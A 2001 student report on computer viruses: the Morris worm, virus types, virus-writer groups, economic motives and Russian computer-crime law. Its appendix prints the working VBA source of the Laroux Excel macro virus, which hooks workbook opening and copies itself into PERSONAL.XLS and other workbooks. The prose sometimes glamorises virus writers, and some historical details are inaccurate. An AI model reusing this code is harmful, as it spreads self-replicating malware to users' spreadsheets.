-

Computer viruses

                          Chuvash State University

                              Economic faculty



                                   Report

                              COMPUTER VIRUSES



                                                   Author:

                                                   student of EC-13-98

                                                   Eugene Ivanov



                              Cheboxary  2001

                                  CONTENTS


A bit of history 3


What is a computer virus?    4


Who writes computer viruses? 5


To whose advantage computer viruses are written?   6


A legal notice. Penal Code of Russian Federation   7


Synopsis    8


SOURCES     9


Appendix    10


                              A bit of history

  2 November 1988 Robert Morris younger (Robert Morris),  graduate  student
of informatics faculty of Cornwall University (USA) infected a great  amount
of computers, connected to Internet network. This  network  unites  machines
of university centres, private companies and governmental agents,  including
National  Aeronautics  Space  Administration,  as  well  as  some   military
scientific centres and labs.
  Network worm has struck 6200  machines  that  formed  7,3%  computers  to
network, and has shown, that UNIX not okay too. Amongst damaged  were  NASA,
LosAlamos National Lab, exploratory centre VMS  USA,  California  Technology
Institute, and Wisconsin  University  (200  from  300  systems).  Spread  on
networks ApraNet, MilNet, Science  Internet,  NSF  Net  it  practically  has
removed these network from building. According  to  "Wall  Street  Journal",
virus has infiltrated networks in Europe and  Australia,  where  there  were
also registered events of blocking the computers.
  Here are some recalls of the event participants:
  Symptom: hundreds or thousands of jobs start running  on  a  Unix  system
bringing response to zero.
  Systems attacked: Unix systems, 4.3BSD Unix & variants (e.g.:  SUNs)  any
sendmail compiled with debug has this problem. This virus is spreading  very
quickly over the Milnet.  Within the past 4 hours,  it  has  hit  >10  sites
across the country, both Arpanet and Milnet sites. Well over 50  sites  have
been hit. Most of these are "major" sites and gateways.
  Method: Someone has written a program that uses a hole in  SMTP  Sendmail
utility. This utility can send a message into another program.
  Apparently what the attacker  did  was  this:  he  or  she  connected  to
sendmail (i.e., telnet victim.machine  25),  issued  the  appropriate  debug
command, and had a small C program compiled. (We have it.  Big  deal.)  This
program took as an argument a host number, and copied  two  programs    one
ending in VAX.OS and the other ending in SunOS    and  tried  to  load  and
execute them. In those cases where the load  and  execution  succeeded,  the
worm did two things (at least): spawn a lot of shells that did  nothing  but
clog the process table and burn  CPU  cycles;  look  in  two  places    the
password file and the internet services file   for  other  sites  it  could
connect to (this is hearsay, but I don't doubt it for  a  minute).  It  used
both individual .host files (which it found using the  password  file),  and
any other remote hosts it could locate which it had a chance  of  connecting
to. It may have done more; one of  our  machines  had  a  changed  superuser
password, but because of other factors we're not sure this worm did it.
  All of Vaxen and some of Suns here were  infected  with  the  virus.  The
virus forks repeated copies of itself as it tries to spread itself, and  the
load averages on the infected machines skyrocketed. In fact, it got  to  the
point that some of the machines ran out  of  swap  space  and  kernel  table
entries, preventing login to even see what was going on!
  The virus also "cleans" up  after  itself.  If  you  reboot  an  infected
machine (or it crashes), the  /tmp  directory  is  normally  cleaned  up  on
reboot. The other incriminating files were  already  deleted  by  the  virus
itself.
  4 November the author of the virus  Morris  come to FBI headquarters in
Washington on his own.  FBI  has  imposed  a  prohibition  on  all  material
relating to the Morris virus.
  22 January 1989 a court of jurors  has  acknowledged  Morris  guilty.  If
denunciatory verdict had been approved without  modification,  Morris  would
have been sentenced to 5 years of  prison  and  250  000  dollars  of  fine.
However Morris' attorney Thomas Guidoboni immediately has lodged  a  protest
and has directed all papers to  the  Circuit  Court  with  the  petition  to
decline the decision of court... Finally Morris was sentenced  to  3  months
of prisons and fine of  270  thousand  dollars,  but  in  addition  Cornwall
University carried a heavy loss, having excluded Morris  from  its  members.
Author then had to take part in liquidation of its own creation.

                          What is a computer virus?

  It is an executable code able to reproduce itself. Viruses are an area of
pure programming, and, unlike other computer  programs,  carry  intellectual
functions on protection from being found and destroyed. They have  to  fight
for survival in complex conditions of conflicting computer  systems.  That's
why they evolve as if they were alive.
  Yes, viruses seem  to  be  the  only  alive  organisms  in  the  computer
environment, and yet another their main goal is survival. That is  why  they
may have complex crypting/decrypting engines, which is indeed a  sort  of  a
standard for computer viruses nowadays, in order to carry out  processes  of
duplicating, adaptation and disguise
  It is necessary to differentiate between reproducing programs and  Trojan
horses. Reproducing programs will not necessarily harm your  system  because
they are aimed at producing as many copies  (or  somewhat-copies)  of  their
own as possible by means of so-called agent programs or without their  help.
In the later case they are referred to as "worms".
  Meanwhile Trojan horses are programs aimed at causing harm or  damage  to
PC's. Certainly it's  a  usual  practice,  when  they  are  part  of  "tech-
organism", but they have completely different functions.
  That is an important point. Destructive actions are not an integral  part
of  the  virus  by  default.  However  virus-writers   allow   presence   of
destructive mechanisms as an active protection from finding  and  destroying
their creatures, as well as  a  response  to  the  attitude  of  society  to
viruses and their authors.
  As you see, there are different types of viruses, and they  have  already
been  separated  into  classes  and  categories.  For  instance:  dangerous,
harmless, and very dangerous. No destruction means a  harmless  one,  tricks
with system halts means a dangerous one,  and  finally  with  a  devastating
destruction means a very dangerous virus.
  But viruses are famous not only for their destructive actions,  but  also
for their special effects, which are almost  impossible  to  classify.  Some
virus-writers suggest the following:

funny, very funny and sad or melancholy (keeps  silence  and  infects).  But
one should remember that special effects must occur  only  after  a  certain
number of contaminations. Users should also be given a  chance  to  restrict
execution of destructive actions, such as deleting  files,  formatting  hard
disks. Thereby virus can be considered to be a  useful  program,  keeping  a
check on system changes and preventing any surprises such as of deletion  of
files or wiping out hard disks.
  It sounds quite heretical to say such  words  about  viruses,  which  are
usually considered  to  be  a  disaster.  The  less  person  understands  in
programming  and  virology,  the  greater  influence  will   have   on   him
possibility of being infected with a virus. Thus,  let's  consider  creators
of viruses as the best source.

                        Who writes computer viruses?

  They are lone wolves or programmers groups.
  In spite of the fact that a lot of people think, that to write a computer
virus is a hardship, it is no exactly  so.  Using  special  programs  called
"Virus creators" even beginners  in  computer  world  can  build  their  own
viruses, which will be a strain of a certain major virus. This is  precisely
the case with notorious virus "Anna Curnikova", which is  actually  a  worm.
The aim of creation of viruses in such way is  pretty  obvious:  the  author
wants to become well known all over the world and to show his powers.
  Somehow, the results of the attempt  can  be  very  sad  (see  a  bit  of
history), only real professionals can go famous and stay  uncaught.  A  good
example is Dark Avenger. Yes, and it's yet another  custom  of  participants
of "the scene"  to take terrifying monikers (nicknames).
  To write something really new and remarkable programmer should have  some
extra knowledge and skills, for example:
  1) good strategic thinking and intuition   releasing  a  virus  and  its
     descendants live their own independent life  in  nearly  unpredictable
     conditions. Therefore the author must anticipate a lot of things;
  2) splendid knowledge of language of the Assembler[1] and  the  operating
     system he writes for  the more there are mistakes in  the  virus  the
     quicker its will be caught;
  3) attention to details and a skill to solve  the  most  varied  tactical
     questions  one won't write a compact,  satisfactory  working  program
     without this abilities;
  4) a high professional discipline  in  order  to  join  preceding  points
     together.
  A computer virus group is an informal  non-profit  organisation,  uniting
programmersauthors of viruses regardless of their qualifications.  Everyone
can become a member of the club, if he creates  viruses,  studies  them  for
the reason of creation and spreading.
  The aims they pursue together may differ from  that  of  a  single  virus
writer, although they usually also try to become as famous as possible.  But
in the same time they may render help to beginning programmers in the  field
of viruses and spread commented  sources  of  viruses  and  virus  algorithm
descriptions.
  One can't say that all of the group members write viruses  in  Assembler.
Actually, you don't have to know any computer language or write any  program
code to become a member or  a  friend  of  the  group.  But  programming  in
Assembler is preferred, Pascal, C++  and  other  high  level  languages  are
considered to be humiliating. It does make sense since programs compiled  in
Assembler are much smaller (0.5-5 kb) and  therefore  more  robust.  On  the
other hand  Assembler  is  quite  difficult  to  understand  especially  for
beginners. One should think in the way computer does: all commands are  send
directly to the central processing unit of PC.
  There are computer virus groups  all  over  the  world,  few  being  more
successful than others. It may be pretty hard to get in  contact  with  them
since they are quite typical representatives of computer  underground  world
as well as (free)wares groups.  Sometimes,  however,  creating  viruses  can
become a respectable occupation, bringing constant  income.  After  all,  no
one but the author of the virus can bring valuable information  on  the  way
it should be treated and cured.


              To whose advantage computer viruses are written?

  Copyleft  (cl)  is  distribution  of  programs  without  registering  the
software, i.e. using a cracked copy. The practice  is  widely  used  in  the
territory of former USSR even by medium and big companies,  to  say  nothing
of  ordinary  users.  This  software  is  stolen,  which  involves  criminal
responsibility (see legal notice). One  of  the  general  valuables  of  our
culture is a generosity, and you can't do anything about it.  But  at  least
freeware lovers should know that  proceeding  with  the  practice  could  be
risky. That's the first use of computer viruses  as a sort of  compensation
to software developers.
  In the very same way writing viruses usually does not  bring  profits  to
the author. At least when the authors of a  virus  and  a  cure  to  it  are
different persons. The situation is  quite  different  when  they  are  not,
especially if the person manages to hide the  fact  of  the  double-dealing.
And that is the second advantage of computer viruses.
  Yes, developers of antiviral  software  gain  money  from  selling  their
remedy to a new widely hyped by the mass media virus. Agitation can grow  so
strong that all and everyone dash to buy  an  antiviral  protection  against
even a most harmless virus. The ordinal behaviour of share indexes in  stock
exchanges while a computer virus epidemic is to fall.  Somehow,  the  shares
of such companies as Symantec (which is famous  for  its  Norton  Antivirus)
will soar up to the sky.
  The tendency is especially significant  in  the  world  of  emerging  New
Economy. This fancy word means an economy, based  on  computer  services  as
the engine of the development. The system takes place in the United  States.
That is why we hardly ever hear the  names  of  Dow  Jones  and  Standard  &
Poor's in the mass  media  nowadays.  Their  place  is  occupied  by  NASDAQ
Composite index, based on the National  Association  of  Securities  Dealers
Automated Quotations system. The index is responsible  for  the  performance
of high-tech companies, the base of the New Economy.
  We can't say for sure, but maybe in the nearest future the index will  be
influenced more by computers themselves, than brokers  and  dealers  in  the
world stock exchanges.  IBM  Corporation  has  recently  presented  its  new
invention  an automated broker, which is indeed a  mainframe  (a  very  big
computer) with  specialised  software.  It  is  a  descendant  of  mainframe
DeepBlue, well known for its skills in chess field. Unfortunately, it  seems
that bad times have come for the whole economy of the USA, which also  means
problems for NASDAQ.
  Nevertheless the initiative of IBM should certainly be greeted. Automated
brokers seem to understand the volatility of indexes in a much  quicker  and
rational way than human beings. There is an only  drawback  to  eliminate  
the problem of artificial intellect. Machine can't think as a human.
  Maybe computer viruses could be of any  use  here  too.  After  all,  the
flights to the Moon become a simple effect of  inventing  the  new  ways  of
civil population  extermination  during  the  Second  World  War  (ballistic
rockets). A wish to kill people did  a  fantastic  daydream  become  reality
within fifty years. The first computing machine was actively used while  the
first atomic bomb  development.  So  sometimes  even  very  bad,  much  more
dangerous than viruses (name at least one person being  victim  of  a  cruel
computer virus), can highly assist to  the  progress  and  bring  a  greater
profit.


              A legal notice. Penal Code of Russian Federation


            Chapter 28. Crimes in sphere of computer information



    Article 272. Illegitimate access to computer information


  1. Illegitimate access to  a  law-protected  computer  information,  i.e.
information on the machine carrier, in  electronic-computing  machine  (PC),
PC  system  or  its  network,  if  it  causes   a   destruction,   blocking,
modification or copying of information, breach of work  PC,  PC  systems  or
its network, 
  is punished by fine in the size from two to five hundred minimum sizes of
labour payment, or in the size of salary/other profit of the  convicted  for
a period from two to five months, or by corrective works for a  period  from
six months to one year, or by deprivation of liberty for a term  up  to  two
years.
  2. Same deed,  performed  by  a  group  of  persons  on  the  preliminary
collusion or by  an  organised  group  or  a  person  using  their  official
position, as well as having access to PC, PC system or to its network, 
  is punished by fine in the size from five to eight hundred minimum  sizes
of labour payment, or in the size of salary/other profit  of  the  convicted
for a period from five to eight months, or by corrective works for a  period
from one to two years, or by arrest for a period from three to  six  months,
or by deprivation of liberty for a term up to two years.


    Article 273. Creation, use and spreading harmful programs for PC.

  1. Making the programs for PC or a  contributing  the  changes  to  exist
programs,  undoubtedly  bringing  about  unauthorised  deleting,   blocking,
modification, or copying  information,  breaking  of  PC  functionality,  PC
systems or its network, as well as use or  spreading  of  such  programs  or
machine carriers with such programs 
  is punished by deprivation of liberty for a term up to three  years  with
the fine in the amount between two  and  five  hundred  minimum  amounts  of
labour payment, or in the amount of salary/other  profit  of  the  convicted
for a period from two five months.
  2. The same deeds having caused on indiscretion heavy consequences, 
  are punished by the deprivation of liberty for a term from three to seven
years.


                                  Synopsis

  The history of computer viruses has begun recently, but  it  has  already
become legendary. Almost everyone knows a few  awesome  fables  about  these
creatures, but hardy anyone understands what computer virus is.
  Computer virus is an executable code able to  reproduce  itself.  Viruses
are an area of pure programming, and, unlike other computer programs,  carry
intellectual functions on protection from being found  and  destroyed.  They
have to fight for survival in complex  conditions  of  conflicting  computer
systems.
  Viruses seem to be the only alive organisms in the computer  environment,
and yet another their main goal is survival.  That  is  why  they  may  have
complex crypting/decrypting engines, which is indeed a sort  of  a  standard
for  computer  viruses  nowadays,  in  order  to  carry  out  processes   of
duplicating, adaptation and disguise
  Viruses are written by lone wolves or programmers groups.
  Using special programs called "Virus creators" even beginners in computer
world can build their own viruses. The aim of creation of  viruses  in  such
way is pretty obvious: the author wants to become well known  all  over  the
world and to show his powers.
  The results of the attempt can be very sad, only real  professionals  can
go famous and stay uncaught. To write something really  new  and  remarkable
programmer should have some extra knowledge and skills.
  A computer virus group is an informal  non-profit  organisation,  uniting
programmersauthors of viruses regardless of their qualifications.  Everyone
can become a member of the club, if he creates  viruses,  studies  them  for
the reason of creation and spreading. You don't have to  know  any  computer
language or write any program code to become a member or  a  friend  of  the
group. Programming in Assembler is preferred, Pascal,  C++  and  other  high
level languages are considered to be humiliating
  There are computer virus groups  all  over  the  world,  few  being  more
successful than others. It may be pretty hard to get in  contact  with  them
since they are quite typical representatives of computer  underground  world
as well as (free)wares groups.  Sometimes,  however,  creating  viruses  can
become a respectable occupation, bringing constant  income.  After  all,  no
one but the author of the virus can bring valuable information  on  the  way
it should be treated and cured.
  Developers of antiviral software gain money from selling their remedy  to
a new widely hyped by the mass media virus. Agitation  can  grow  so  strong
that all and everyone dash to buy an antiviral  protection  against  even  a
most harmless virus.  The  ordinal  behaviour  of  share  indexes  in  stock
exchanges while a computer virus epidemic is to fall.  Somehow,  the  shares
of high-tech companies producing antiviral software  will  soar  up  to  the
sky.
  An epidemic of foot-and-mouth disease has  overwhelmed  Europe  in  these
days (March 15, 2001). It seems that a vast economic crisis is breaking  out
in America. World finances make their best to escape the worst.
  A break-through in the sphere of artificial intellect  development  could
prevent NASDAQ from complete  falling  down.  The  help  may  come  from  an
unexpected side...
  But don't forget that creation, use and spreading harmful programs for PC
is a criminal offence, as well as using cracked versions  of  programs.  Our
penal code establishes a punishment up to seven years of jail.
  And be aware that computer viruses came for a long time, unless forever.


                                   SOURCES


1. Penal Code of Russian Federation
2. Handless N.N. Computer virology. Part 1: General principles of
   operation, categorization and catalogue of the most widespread viruses in
   operating system MS DOS.  Kiev, 1990.
3. Infected Voice. Issue 1, September, 1994.  STEALTH group.
4. Infected Voice. Issue 2, October, 1994.  STEALTH group.
5. Infected Voice. Issue 3. December, 1994.  STEALTH group.


                                  Appendix


   An fragment of a macrovirus (Laroux), written in a high-level computer
                         language (ExelVisualBasic)

Attribute VB_Name = "laroux"

Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.OnSheetActivate = "check_files"
End Sub

Sub check_files()
Attribute check_files.VB_ProcData.VB_Invoke_Func = " \n14"
    c$ = Application.StartupPath
    m$ = Dir(c$ & "\" & "PERSONAL.XLS")
    If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
    If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
    whichfile = p + w * 10

Select Case whichfile
    Case 10
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    Sheets("laroux").Visible = True
    Sheets("laroux").Select
    Sheets("laroux").Copy
    With ActiveWorkbook
        .Title = ""
        .Subject = ""
        .Author = ""
        .Keywords = ""
        .Comments = ""
    End With
    newname$ = ActiveWorkbook.Name
    c4$ = CurDir()
    ChDir Application.StartupPath
    ActiveWindow.Visible = False
    Workbooks(newname$).SaveAs FileName:=Application.StartupPath & "/" &
"PERSONAL.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
    ChDir c4$
    Workbooks(n4$).Sheets("laroux").Visible = False
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "personal.xls!check_files"
    Case 1
    Application.ScreenUpdating = False
    n4$ = ActiveWorkbook.Name
    p4$ = ActiveWorkbook.Path
    s$ = Workbooks(n4$).Sheets(1).Name
    If s$ <> "laroux" Then
        Workbooks("PERSONAL.XLS").Sheets("laroux").Copy
before:=Workbooks(n4$).Sheets(1)
        Workbooks(n4$).Sheets("laroux").Visible = False
    Else
    End If
    Application.OnSheetActivate = ""
    Application.ScreenUpdating = True
    Application.OnSheetActivate = "personal.xls!check_files"
    Case Else
End Select
End Sub
-----------------------
[1] Assembler - a low level, hardware- oriented computer language



"Computer viruses"